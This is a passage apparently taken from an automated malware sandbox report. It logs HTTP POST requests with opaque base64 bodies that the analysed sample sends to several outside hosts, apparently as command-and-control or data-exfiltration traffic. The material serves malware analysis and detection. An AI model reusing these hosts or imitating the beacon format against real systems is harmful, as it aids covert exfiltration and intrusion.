4b 7a 69 68 6e 62 62 47 6e 4d 63 7a 32 69 69 38 57 58 71 6e 50 73 2f 67 35 36 34 30 70 51 39 30 71 6c 45 46 69 38 71 53 49 46 6d 65 75 49 32 49 64 68 54 51 38 5a 4f 37 4a 41 78 4a 39 5a 65 49 45 56 69 2f 37 4e 4d 2b 31 4e 50 66 66 33 79 43 33 6e 78 45 50 72 66 71 4d 61 38 47 48 47 71 6a 43 73 52 65 49 65 6e 54 4b 58 75 7a 45 48 6e 2f 61 71 4a 64 54 4e 73 4a 6a 4c 51 70 7a 63 4c 43 65 54 76 79 55 41 47 34 32 47 51 39 37 38 78 72 77 49 63 6f 72 75 66 65 4e 65 74 49 4d 57 79 62 46 56 64 71 58 72 4d 39 5a 7a 53 30 2b 43 4b 6c 73 39 4c 50 7a 61 68 64 41 78 36 4f 65 79 2b 77 78 30 55 38 56 56 66 70 6f 35 56 33 59 6d 4c 7a 68 38 78 6d 72 67 2f 66 33 75 71 42 4d 46 63 4c 54 71 62 52 78 48 41 54 76 48 46 66 59 33 6d 56 30 6e 33 75 57 4a 43 4d 71 4e 78 4f 61 6a 72 6d 2b 63 4e 63 33 5a 41 72 37 55 32 6c 70 6d 61 41 72 50 36 63 65 44 31 53 41 72 38 69 45 33 76 72 51 64 59 37 48 6a 4f 69 54 68 4b 66 62 Data Ascii: pMaZOFxp8IsaARwdh/Waa+/EAl90iROYUKCz5d//5sRgbIEhO5MBJ61f0Qsu64lTUr8ow+WCgBBZ7mBs5WhL6vI7Ub//pZV+y3xWbKctp8yRBSZS3DOo9o0l1DBWyxncbIgQLBTlupjysLYEa0hfZv7MdssEgAdKeIt6pMDB45RqwmLJF6/D5s077R/R3Aq3VgCRDZlfV6KrMGaRnI2ValSnkjWdSurTix9YSHxDhzFMf9Q9ZD3KzihnbbGnMcz2ii8WXqnPs/g5640pQ90qlEFi8qSIFmeuI2IdhTQ8ZO7JAxJ9ZeIEVi/7NM+1NPff3yC3nxEPrfqMa8GHGqjCsReIenTKXuzEHn/aqJdTNsJjLQpzcLCeTvyUAG42GQ978xrwIcorufeNetIMWybFVdqXrM9ZzS0+CKls9LPzahdAx6Oey+wx0U8VVfpo5V3YmLzh8xmrg/f3uqBMFcLTqbRxHATvHFfY3mV0n3uWJCMqNxOajrm+cNc3ZAr7U2lpmaArP6ceD1SAr8iE3vrQdY7HjOiThKfb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 70 4d 61 5a 4f 46 78 70 38 49 73 61 41 52 77 64 68 2f 57 61 61 2b 2f 45 41 6c 39 30 69 52 4f 59 55 4b 43 7a 35 64 2f 2f 35 73 52 67 62 49 45 68 4f 35 4d 42 4a 36 31 66 30 51 73 75 36 34 6c 54 55 72 38 6f 77 2b 57 43 67 42 42 5a 37 6d 42 73 35 57 68 4c 36 76 49 37 55 62 2f 2f 70 5a 56 2b 79 33 78 57 62 4b 63 74 70 38 79 52 42 53 5a 53 33 44 4f 6f 39 6f 30 6c 31 44 42 57 79 78 6e 63 62 49 67 51 4c 42 54 6c 75 70 6a 79 73 4c 59 45 61 30 68 66 5a 76 37 4d 64 73 73 45 67 41 64 4b 65 49 74 36 70 4d 44 42 34 35 52 71 77 6d 4c 4a 46 36 2f 44 35 73 30 37 37 52 2f 52 33 41 71 33 56 67 43 52 44 5a 6c 66 56 36 4b 72 4d 47 61 52 6e 49 32 56 61 6c 53 6e 6b 6a 57 64 53 75 72 54 69 78 39 59 53 48 78 44 68 7a 46 4d 66 39 51 39 5a 44 33 4b 7a 69 68 6e 62 62 47 6e 4d 63 7a 32 69 69 38 57 58 71 6e 50 73 2f 67 35 36 34 30 70 51 39 30 71 6c 45 46 69 38 71 53 49 46 6d 65 75 49 32 49 64 68 54 51 38 5a 4f 37 4a 41 78 4a 39 5a 65 49 45 56 69 2f 37 4e 4d 2b 31 4e 50 66 66 33 79 43 33 6e 78 45 50 72 66 71 4d 61 38 47 48 47 71 6a 43 73 52 65 49 65 6e 54 4b 58 75 7a 45 48 6e 2f 61 71 4a 64 54 4e 73 4a 6a 4c 51 70 7a 63 4c 43 65 54 76 79 55 41 47 34 32 47 51 39 37 38 78 72 77 49 63 6f 72 75 66 65 4e 65 74 49 4d 57 79 62 46 56 64 71 58 72 4d 39 5a 7a 53 30 2b 43 4b 6c 73 39 4c 50 7a 61 68 64 41 78 36 4f 65 79 2b 77 78 30 55 38 56 56 66 70 6f 35 56 33 59 6d 4c 7a 68 38 78 6d 72 67 2f 66 33 75 71 42 4d 46 63 4c 54 71 62 52 78 48 41 54 76 48 46 66 59 33 6d 56 30 6e 33 75 57 4a 43 4d 71 4e 78 4f 61 6a 72 6d 2b 63 4e 63 33 5a 41 72 37 55 32 6c 70 6d 61 41 72 50 36 63 65 44 31 53 41 72 38 69 45 33 76 72 51 64 59 37 48 6a 4f 69 54 68 4b 66 62 Data Ascii: pMaZOFxp8IsaARwdh/Waa+/EAl90iROYUKCz5d//5sRgbIEhO5MBJ61f0Qsu64lTUr8ow+WCgBBZ7mBs5WhL6vI7Ub//pZV+y3xWbKctp8yRBSZS3DOo9o0l1DBWyxncbIgQLBTlupjysLYEa0hfZv7MdssEgAdKeIt6pMDB45RqwmLJF6/D5s077R/R3Aq3VgCRDZlfV6KrMGaRnI2ValSnkjWdSurTix9YSHxDhzFMf9Q9ZD3KzihnbbGnMcz2ii8WXqnPs/g5640pQ90qlEFi8qSIFmeuI2IdhTQ8ZO7JAxJ9ZeIEVi/7NM+1NPff3yC3nxEPrfqMa8GHGqjCsReIenTKXuzEHn/aqJdTNsJjLQpzcLCeTvyUAG42GQ978xrwIcorufeNetIMWybFVdqXrM9ZzS0+CKls9LPzahdAx6Oey+wx0U8VVfpo5V3YmLzh8xmrg/f3uqBMFcLTqbRxHATvHFfY3mV0n3uWJCMqNxOajrm+cNc3ZAr7U2lpmaArP6ceD1SAr8iE3vrQdY7HjOiThKfb
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 71 44 35 55 4d 65 49 73 38 49 74 4b 4a 33 51 69 56 55 61 56 61 32 55 41 62 78 68 79 67 73 6e 77 4e 67 6c 55 7a 77 57 32 4d 33 35 69 69 57 51 6f 36 5a 38 64 75 4a 4b 45 76 4e 61 43 65 42 77 79 31 42 74 61 70 76 63 6c 6a 64 4e 53 50 6e 54 6a 56 53 35 41 66 6e 55 6e 71 37 68 71 6b 6b 59 54 34 63 41 5a 39 33 45 70 47 31 6f 34 47 76 58 46 4d 74 64 32 58 61 70 4c 4d 74 31 6a 33 35 78 61 56 70 61 43 39 4c 44 4f 6e 56 53 76 73 4f 68 55 4e 45 4d 45 65 50 76 5a 68 37 6f 45 77 35 49 4b 68 70 79 2b 47 79 75 5a 6b 6b 65 4a 46 55 59 6f 6e 71 56 5a 55 35 39 50 4b 79 77 52 66 74 6a 54 5a 53 53 51 67 53 4b 50 6a 76 6b 2f 56 79 44 68 38 67 76 48 42 34 35 31 31 4b 36 6e 78 55 35 30 64 46 59 5a 38 42 68 4d 78 42 44 6f 56 4f 2f 6b 71 48 2f 6a 63 59 41 69 68 43 78 59 66 5a 73 6b 79 78 32 39 72 52 6d 44 63 34 56 74 43 65 7a 6c 52 50 77 31 39 38 79 77 79 52 53 54 51 34 47 33 45 41 50 52 30 4e 6a 75 56 38 45 43 63 39 55 30 6a 68 2b 4b 2b 33 7a 49 35 44 39 67 73 74 72 35 2b 50 38 50 2f 6e 75 46 51 5a 33 72 36 6d 5a 4a 4c 74 35 76 34 33 72 2b 62 42 58 42 6f 6a 62 34 66 4d 49 6c 4b 4b 36 77 44 31 44 6e 31 4e 56 79 58 54 64 36 33 46 49 2b 6a 55 4e 65 48 71 50 2f 58 77 30 2b 6e 4e 46 49 4a 39 75 33 69 5a 45 48 5a 63 38 67 43 42 7a 56 50 5a 38 6c 5a 2b 71 63 68 46 32 50 52 4f 76 31 4d 32 51 49 65 2f 73 34 30 5a 48 78 79 74 68 35 2f 61 52 73 44 66 6e 72 79 70 4e 68 36 39 52 69 53 51 78 51 31 48 46 43 72 4c 46 7a 6f 65 6b 30 54 56 4b 54 74 6b 66 6d 63 64 78 41 65 61 34 4e 51 53 7a 61 4d 71 33 33 4f 6f 52 64 39 34 53 62 4d 42 53 4c 45 74 70 71 6a 77 75 36 64 4e 62 2f 32 44 4b 51 58 5a 54 36 68 6d 66 7a 63 66 62 55 50 32 73 38 32 41 41 6e 55 33 4b 71 6e 57 52 36 4e 79 45 51 5a 50 42 78 41 43 56 63 66 77 41 50 78 77 39 78 Data Ascii: qD5UMeIs8ItKJ3QiVUaVa2UAbxhygsnwNglUzwW2M35iiWQo6Z8duJKEvNaCeBwy1BtapvcljdNSPnTjVS5AfnUnq7hqkkYT4cAZ93EpG1o4GvXFMtd2XapLMt1j35xaVpaC9LDOnVSvsOhUNEMEePvZh7oEw5IKhpy+GyuZkkeJFUYonqVZU59PKywRftjTZSSQgSKPjvk/VyDh8gvHB4511K6nxU50dFYZ8BhMxBDoVO/kqH/jcYAihCxYfZskyx29rRmDc4VtCezlRPw198ywyRSTQ4G3EAPR0NjuV8ECc9U0jh+K+3zI5D9gstr5+P8P/nuFQZ3r6mZJLt5v43r+bBXBojb4fMIlKK6wD1Dn1NVyXTd63FI+jUNeHqP/Xw0+nNFIJ9u3iZEHZc8gCBzVPZ8lZ+qchF2PROv1M2QIe/s40ZHxyth5/aRsDfnrypNh69RiSQxQ1HFCrLFzoek0TVKTtkfmcdxAea4NQSzaMq33OoRd94SbMBSLEtpqjwu6dNb/2DKQXZT6hmfzcfbUP2s82AAnU3KqnWR6NyEQZPBxACVcfwAPxw9x
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheCookie: __cf_bm=KrpZpH2LWSmhErUxPF2gyuBsotJc3LGsP0.8r4fMkSI-1688537160-0-ATZQ5sZaxL9V7VdLA+droG3Wot6+wIDTr0pfoxJDGJxMGIRCwZNUYR/itiI3IG+WFhtXcUH/BWDu72U4Y+Y1yMk=Data Raw: 57 50 73 76 6d 79 37 74 2b 34 76 2f 52 42 69 38 4f 56 49 34 34 70 46 47 37 44 32 75 70 73 38 32 51 6f 68 74 41 43 38 70 63 31 54 5a 6b 4b 5a 52 36 47 38 51 46 30 4a 31 4c 58 6d 32 4a 4d 42 37 77 55 33 73 4c 42 4c 4f 67 66 47 34 41 44 4d 53 63 59 79 6f 71 50 6c 68 7a 73 77 42 41 4e 77 74 4e 66 39 72 6c 53 55 4f 41 57 4c 50 42 63 33 43 55 78 76 39 56 61 41 51 47 64 34 6c 50 56 47 39 4c 5a 2f 54 59 4d 64 79 73 39 51 41 2b 72 75 52 45 61 69 4a 77 55 4c 65 65 6f 47 41 65 32 48 36 45 62 77 6e 72 34 68 59 4b 46 48 47 6e 70 36 67 58 79 51 5a 2b 6d 77 62 33 33 6c 46 36 78 45 7a 2f 71 73 76 74 63 77 73 62 38 6d 38 44 58 7a 62 69 74 6a 5a 55 6d 77 6a 72 68 4a 6f 4b 43 44 45 68 6d 69 54 6a 71 53 4c 6d 30 30 75 2f 6d 79 71 2b 4b 53 57 34 55 63 65 30 61 67 61 37 53 62 41 33 43 6e 35 65 65 48 6b 61 68 73 6a 46 46 79 47 31 6a 6b 57 73 69 43 70 56 4d 48 6b 66 51 44 6d 4f 4e 49 6f 74 67 6c 4f 42 4d 31 6e 4e 59 72 32 76 53 4f 49 30 4c 36 5a 71 67 41 31 63 75 34 66 74 2b 62 7a 58 4e 70 79 30 6e 66 73 56 41 2f 57 59 30 56 70 37 51 50 41 71 62 36 6a 39 6c 42 50 54 47 30 65 51 36 35 70 64 7a 67 32 32 30 71 78 5a 36 30 68 4e 5a 4f 66 53 70 6d 6f 6f 37 47 4c 43 67 6b 4d 47 6a 4f 6b 58 35 56 37 35 66 47 37 6f 64 59 76 32 43 6d 69 6d 6e 31 48 59 51 5a 61 30 64 6d 34 7a 50 52 34 2b 74 50 56 6f 62 65 72 50 33 39 4b 71 36 4a 50 4b 56 59 50 6a 54 54 37 78 57 65 41 77 33 6f 4c 64 55 63 6c 62 5a 36 38 30 73 47 6e 46 58 55 6a 75 36 57 4c 6d 59 39 53 2f 79 4c 71 76 69 53 51 49 70 69 70 6a 51 67 34 35 45 32 51 2f 5a 54 42 2b 53 65 2b 50 2f 61 46 75 53 62 5a 43 4c 35 77 78 7a 52 67 33 4a 50 63 4e 79 5a 77 46 58 54 49 73 2b 36 76 62 58 4f 42 58 4a 63 31 Data Ascii: WPsvmy7t+4v/RBi8OVI44pFG7D2ups82QohtAC8pc1TZkKZR6G8QF0J1LXm2JMB7wU3sLBLOgfG4ADMScYyoqPlhzswBANwtNf9rlSUOAWLPBc3CUxv9VaAQGd4lPVG9LZ/TYMdys9QA+ruREaiJwULeeoGAe2H6Ebwnr4hYKFHGnp6gXyQZ+mwb33lF6xEz/qsvtcwsb8m8DXzbitjZUmwjrhJoKCDEhmiTjqSLm00u/myq+KSW4Uce0aga7SbA3Cn5eeHkahsjFFyG1jkWsiCpVMHkfQDmONIotglOBM1nNYr2vSOI0L6ZqgA1cu4ft+bzXNpy0nfsVA/WY0Vp7QPAqb6j9lBPTG0eQ65pdzg220qxZ60hNZOfSpmoo7GLCgkMGjOkX5V75fG7odYv2Cmimn1HYQZa0dm4zPR4+tPVoberP39Kq6JPKVYPjTT7xWeAw3oLdUclbZ680sGnFXUju6WLmY9S/yLqviSQIpipjQg45E2Q/ZTB+Se+P/aFuSbZCL5wxzRg3JPcNyZwFXTIs+6vbXOBXJc1
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 71 44 35 55 4d 65 49 73 38 49 74 4b 4a 33 51 69 56 55 61 56 61 32 55 41 62 78 68 79 67 73 6e 77 4e 67 6c 55 7a 77 57 32 4d 33 35 69 69 57 51 6f 36 5a 38 64 75 4a 4b 45 76 4e 61 43 65 42 77 79 31 42 74 61 70 76 63 6c 6a 64 4e 53 50 6e 54 6a 56 53 35 41 66 6e 55 6e 71 37 68 71 6b 6b 59 54 34 63 41 5a 39 33 45 70 47 31 6f 34 47 76 58 46 4d 74 64 32 58 61 70 4c 4d 74 31 6a 33 35 78 61 56 70 61 43 39 4c 44 4f 6e 56 53 76 73 4f 68 55 4e 45 4d 45 65 50 76 5a 68 37 6f 45 77 35 49 4b 68 70 79 2b 47 79 75 5a 6b 6b 65 4a 46 55 59 6f 6e 71 56 5a 55 35 39 50 4b 79 77 52 66 74 6a 54 5a 53 53 51 67 53 4b 50 6a 76 6b 2f 56 79 44 68 38 67 76 48 42 34 35 31 31 4b 36 6e 78 55 35 30 64 46 59 5a 38 42 68 4d 78 42 44 6f 56 4f 2f 6b 71 48 2f 6a 63 59 41 69 68 43 78 59 66 5a 73 6b 79 78 32 39 72 52 6d 44 63 34 56 74 43 65 7a 6c 52 50 77 31 39 38 79 77 79 52 53 54 51 34 47 33 45 41 50 52 30 4e 6a 75 56 38 45 43 63 39 55 30 6a 68 2b 4b 2b 33 7a 49 35 44 39 67 73 74 72 35 2b 50 38 50 2f 6e 75 46 51 5a 33 72 36 6d 5a 4a 4c 74 35 76 34 33 72 2b 62 42 58 42 6f 6a 62 34 66 4d 49 6c 4b 4b 36 77 44 31 44 6e 31 4e 56 79 58 54 64 36 33 46 49 2b 6a 55 4e 65 48 71 50 2f 58 77 30 2b 6e 4e 46 49 4a 39 75 33 69 5a 45 48 5a 63 38 67 43 42 7a 56 50 5a 38 6c 5a 2b 71 63 68 46 32 50 52 4f 76 31 4d 32 51 49 65 2f 73 34 30 5a 48 78 79 74 68 35 2f 61 52 73 44 66 6e 72 79 70 4e 68 36 39 52 69 53 51 78 51 31 48 46 43 72 4c 46 7a 6f 65 6b 30 54 56 4b 54 74 6b 66 6d 63 64 78 41 65 61 34 4e 51 53 7a 61 4d 71 33 33 4f 6f 52 64 39 34 53 62 4d 42 53 4c 45 74 70 71 6a 77 75 36 64 4e 62 2f 32 44 4b 51 58 5a 54 36 68 6d 66 7a 63 66 62 55 50 32 73 38 32 41 41 6e 55 33 4b 71 6e 57 52 36 4e 79 45 51 5a 50 42 78 41 43 56 63 66 77 41 50 78 77 39 78 Data Ascii: qD5UMeIs8ItKJ3QiVUaVa2UAbxhygsnwNglUzwW2M35iiWQo6Z8duJKEvNaCeBwy1BtapvcljdNSPnTjVS5AfnUnq7hqkkYT4cAZ93EpG1o4GvXFMtd2XapLMt1j35xaVpaC9LDOnVSvsOhUNEMEePvZh7oEw5IKhpy+GyuZkkeJFUYonqVZU59PKywRftjTZSSQgSKPjvk/VyDh8gvHB4511K6nxU50dFYZ8BhMxBDoVO/kqH/jcYAihCxYfZskyx29rRmDc4VtCezlRPw198ywyRSTQ4G3EAPR0NjuV8ECc9U0jh+K+3zI5D9gstr5+P8P/nuFQZ3r6mZJLt5v43r+bBXBojb4fMIlKK6wD1Dn1NVyXTd63FI+jUNeHqP/Xw0+nNFIJ9u3iZEHZc8gCBzVPZ8lZ+qchF2PROv1M2QIe/s40ZHxyth5/aRsDfnrypNh69RiSQxQ1HFCrLFzoek0TVKTtkfmcdxAea4NQSzaMq33OoRd94SbMBSLEtpqjwu6dNb/2DKQXZT6hmfzcfbUP2s82AAnU3KqnWR6NyEQZPBxACVcfwAPxw9x
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 30 76 69 59 64 4a 66 38 41 6f 7a 46 73 52 48 4c 68 76 48 34 4d 2b 41 75 46 35 72 4e 69 48 61 74 75 77 48 31 58 49 73 43 6a 31 30 6f 4b 6d 49 43 51 30 6f 33 76 42 58 6a 68 55 68 69 47 4c 51 4a 66 38 4c 58 56 4d 46 56 2f 75 55 6a 4b 65 53 44 5a 53 2b 4b 44 5a 77 4f 44 4c 59 71 2b 69 58 68 6c 4a 34 75 4c 4f 48 34 4c 71 59 50 52 6f 71 6a 2f 57 58 62 32 63 46 76 35 2f 49 4e 6a 68 4c 46 36 31 77 58 54 64 67 6f 37 72 6a 71 4a 61 57 76 33 58 41 33 67 43 6e 50 51 39 74 6e 33 4c 2b 6a 5a 66 30 38 39 4e 6a 54 6c 69 4e 6c 6c 67 65 52 4d 30 50 59 42 48 4e 77 53 62 52 44 30 6c 49 39 6e 6d 6c 54 6b 7a 49 53 70 34 57 49 65 6f 55 2f 59 6c 43 70 44 74 38 38 51 66 45 58 39 36 2f 49 4b 53 49 64 58 6a 6e 71 6a 2b 55 34 6e 79 57 46 37 33 79 49 63 62 51 35 67 45 68 67 33 2b 48 53 58 38 6d 6e 6c 79 30 61 79 31 51 75 64 41 7a 49 63 52 4d 2f 78 30 50 35 50 42 46 57 31 43 4d 70 2f 57 76 6c 65 52 4d 47 33 46 69 37 51 44 56 39 42 38 6b 73 56 68 39 32 4c 6b 38 2f 58 38 50 39 2f 2f 35 6e 71 37 32 58 59 56 53 52 41 47 38 4f 34 5a 45 59 6c 51 7a 74 65 6a 30 61 67 6d 48 6b 49 7a 70 59 35 31 67 2f 34 75 42 68 55 53 33 6c 64 6d 53 51 71 6c 39 54 46 32 55 77 4e 52 6d 57 70 63 49 75 5a 59 51 57 4a 73 55 6c 4e 6b 53 65 31 75 6c 32 70 59 43 46 59 4f 32 7a 5a 54 4c 53 33 33 7a 32 53 38 6b 35 64 61 58 43 71 46 6d 33 2f 79 33 6e 44 70 54 39 65 31 34 52 32 33 4d 7a 37 65 41 4f 78 4b 76 56 32 65 36 4d 68 57 66 2f 57 43 6e 77 32 53 44 46 51 61 64 48 32 38 75 65 67 45 72 4c 32 37 74 2b 62 57 75 7a 63 41 4a 67 55 6f 63 65 6b 44 67 44 5a 5a 78 77 72 6c 75 75 6a 74 6e 41 62 51 51 6b 6e 4d 78 51 5a 38 49 42 57 62 55 73 67 5a 63 57 63 72 4d 53 57 74 74 56 58 34 59 4d 44 41 4b 4a 75 49 6a 45 42 59 33 63 49 77 31 47 72 4b 77 37 37 45 63 62 62 63 69 61 53 6b 46 57 57 39 38 3d Data Ascii: 0viYdJf8AozFsRHLhvH4M+AuF5rNiHatuwH1XIsCj10oKmICQ0o3vBXjhUhiGLQJf8LXVMFV/uUjKeSDZS+KDZwODLYq+iXhlJ4uLOH4LqYPRoqj/WXb2cFv5/INjhLF61wXTdgo7rjqJaWv3XA3gCnPQ9tn3L+jZf089NjTliNllgeRM0PYBHNwSbRD0lI9nmlTkzISp4WIeoU/YlCpDt88QfEX96/IKSIdXjnqj+U4nyWF73yIcbQ5gEhg3+HSX8mnly0ay1QudAzIcRM/x0P5PBFW1CMp/WvleRMG3Fi7QDV9B8ksVh92Lk8/X8P9//5nq72XYVSRAG8O4ZEYlQztej0agmHkIzpY51g/4uBhUS3ldmSQql9TF2UwNRmWpcIuZYQWJsUlNkSe1ul2pYCFYO2zZTLS33z2S8k5daXCqFm3/y3nDpT9e14R23Mz7eAOxKvV2e6MhWf/WCnw2SDFQadH28uegErL27t+bWuzcAJgUocekDgDZZxwrluujtnAbQQknMxQZ8IBWbUsgZcWcrMSWttVX4YMDAKJuIjEBY3cIw1GrKw77EcbbciaSkFWW98=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 66 68 56 55 50 56 79 42 43 59 78 6f 47 4b 6e 6b 68 79 31 78 78 4f 2b 63 4d 37 52 30 73 5a 35 35 55 44 69 52 38 46 2f 33 43 58 75 43 45 47 43 72 33 61 68 65 55 59 57 6f 6a 42 6d 33 38 71 37 46 4c 6e 62 7a 55 39 49 49 6e 4e 73 34 6f 4b 76 64 47 44 50 52 58 6e 2f 43 43 34 70 4b 33 44 76 70 56 49 6c 48 66 41 73 51 66 36 68 72 31 34 6f 55 39 6b 76 46 78 74 6e 56 67 43 69 74 5a 72 58 59 48 50 46 2b 79 76 76 59 78 44 4b 31 2f 6b 31 4b 46 33 43 6b 2f 4f 77 78 65 44 56 44 48 42 48 4d 6b 45 47 72 42 46 7a 30 50 31 36 4a 6f 6d 55 63 68 56 2f 63 7a 56 7a 4e 35 64 55 36 44 72 78 4e 79 4f 71 66 4c 6e 6b 61 6f 6e 6a 39 71 39 45 56 32 50 43 34 64 70 49 4a 71 6d 58 2f 57 32 41 64 64 72 6b 49 49 74 4a 69 63 32 37 55 6a 6b 77 49 63 55 49 35 75 36 39 77 37 46 65 65 4c 52 2f 79 6c 38 4d 31 70 53 59 55 2f 31 44 66 39 62 44 39 6f 59 73 54 42 6b 36 36 59 66 45 57 45 37 70 57 71 49 58 51 38 6d 6d 74 50 50 78 31 71 44 73 50 5a 73 6d 33 6e 50 58 67 42 66 41 31 43 6f 37 7a 4e 69 6a 4e 69 66 33 63 76 2f 64 51 55 54 74 2b 32 73 48 79 47 49 77 64 59 74 70 4d 69 6c 6e 6a 39 4b 6e 6c 5a 49 7a 52 69 37 4d 39 4c 59 61 58 67 62 56 65 63 46 39 71 4d 53 4e 4c 64 51 57 31 7a 7a 2b 48 39 50 41 52 52 6d 4e 58 6a 49 74 76 55 38 75 31 76 46 64 42 64 64 59 48 66 70 50 4d 76 4c 46 46 5a 78 35 37 68 4a 46 77 4e 65 2f 6f 69 58 68 38 71 68 5a 56 63 57 6f 38 46 6e 61 58 38 6e 55 63 72 6d 66 39 44 37 74 51 4a 5a 37 38 74 32 4e 44 39 4f 57 33 46 30 51 61 6f 52 72 64 70 64 72 45 74 68 4b 69 6e 41 77 45 47 38 47 74 62 47 61 77 48 36 7a 48 45 62 30 30 73 30 43 55 35 73 33 36 7a 6c 51 52 6e 52 38 70 48 6c 7a 6e 46 44 63 5a 78 58 62 62 75 77 30 71 71 66 6a 79 77 49 43 4e 4d 74 33 44 73 59 4b 52 59 45 7a 75 58 53 72 6a 78 43 4a 66 79 2f 6c 4d 72 35 30 46 2b 6e 42 76 43 52 34 31 68 64 75 58 Data Ascii: fhVUPVyBCYxoGKnkhy1xxO+cM7R0sZ55UDiR8F/3CXuCEGCr3aheUYWojBm38q7FLnbzU9IInNs4oKvdGDPRXn/CC4pK3DvpVIlHfAsQf6hr14oU9kvFxtnVgCitZrXYHPF+yvvYxDK1/k1KF3Ck/OwxeDVDHBHMkEGrBFz0P16JomUchV/czVzN5dU6DrxNyOqfLnkaonj9q9EV2PC4dpIJqmX/W2AddrkIItJic27UjkwIcUI5u69w7FeeLR/yl8M1pSYU/1Df9bD9oYsTBk66YfEWE7pWqIXQ8mmtPPx1qDsPZsm3nPXgBfA1Co7zNijNif3cv/dQUTt+2sHyGIwdYtpMilnj9KnlZIzRi7M9LYaXgbVecF9qMSNLdQW1zz+H9PARRmNXjItvU8u1vFdBddYHfpPMvLFFZx57hJFwNe/oiXh8qhZVcWo8FnaX8nUcrmf9D7tQJZ78t2ND9OW3F0QaoRrdpdrEthKinAwEG8GtbGawH6zHEb00s0CU5s36zlQRnR8pHlznFDcZxXbbuw0qqfjywICNMt3DsYKRYEzuXSrjxCJfy/lMr50F+nBvCR41hduX
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.photo4b.comCache-Control: no-cacheData Raw: 61 52 41 4a 65 66 7a 42 45 34 78 4c 38 34 4f 69 70 7a 56 57 4b 6f 2f 4b 4d 65 32 55 33 72 79 7a 38 44 4a 51 59 71 78 4e 7a 69 32 41 42 4f 32 79 30 56 54 77 59 32 45 6f 73 47 42 31 31 34 6b 44 55 5a 48 37 66 6b 30 41 5a 2b 46 53 63 39 46 56 67 6a 68 4b 66 47 68 6d 7a 74 56 66 6e 77 36 47 6d 2b 76 2b 32 45 4d 4e 76 42 65 6f 75 48 58 46 4e 49 35 41 6b 45 74 55 36 75 4f 47 68 58 42 59 51 30 62 47 39 48 79 6c 50 49 6c 42 69 73 2f 6b 7a 69 73 77 41 55 5a 38 6d 43 61 4c 47 6c 4b 4a 38 63 41 59 41 63 69 50 6b 6c 51 76 6c 43 38 35 4b 42 49 76 73 73 45 64 5a 2b 6b 36 50 4c 4a 55 69 48 5a 57 53 6b 4b 34 6d 5a 61 79 75 47 48 67 58 67 7a 73 70 61 4f 6f 68 62 65 36 4a 2b 6a 38 53 5a 49 63 6a 6b 77 64 58 44 6c 71 30 36 30 31 4b 72 54 77 5a 45 58 65 6a 39 4f 64 48 7a 39 35 69 39 79 68 53 49 77 31 61 71 4e 42 69 51 75 57 38 55 44 4a 45 6c 33 33 32 68 51 59 43 35 63 32 34 73 44 52 6e 32 50 6d 4f 66 6b 4f 33 7a 65 4c 4d 52 4c 66 2b 4b 74 36 47 63 49 76 36 36 30 53 6f 77 6d 46 72 2f 32 62 38 41 72 78 53 50 79 43 69 65 70 31 67 36 34 4a 5a 70 6e 76 5a 63 36 72 63 46 35 4b 7a 57 68 48 4b 35 4d 6d 52 74 38 66 57 44 74 49 48 70 4a 58 4b 76 47 4b 4c 61 75 56 53 5a 4c 67 4d 38 50 67 4b 54 64 6d 7a 38 68 74 54 78 6b 59 2b 35 30 6d 45 74 36 6f 62 75 5a 76 6f 6d 4c 30 78 74 67 74 49 59 48 46 56 68 44 62 56 66 6e 50 4d 53 50 65 49 6f 4d 76 78 76 70 56 2f 46 6b 4b 79 75 79 62 58 46 71 44 79 44 6c 6a 74 49 62 7a 38 6d 42 79 30 72 68 76 4e 78 4c 55 4b 31 4f 36 4e 35 58 78 50 41 51 51 43 34 2b 57 68 6c 73 2f 65 58 2b 74 76 56 36 49 6d 51 4d 68 62 38 37 49 43 72 66 66 50 75 54 30 6b 50 67 55 6c 47 48 64 69 31 57 52 59 59 2f 38 6b 4f 31 69 4f 57 59 32 39 32 76 4f 56 53 54 62 65 6f 57 71 67 58 36 44 56 4e 68 66 4e 43 34 3d Data Ascii: 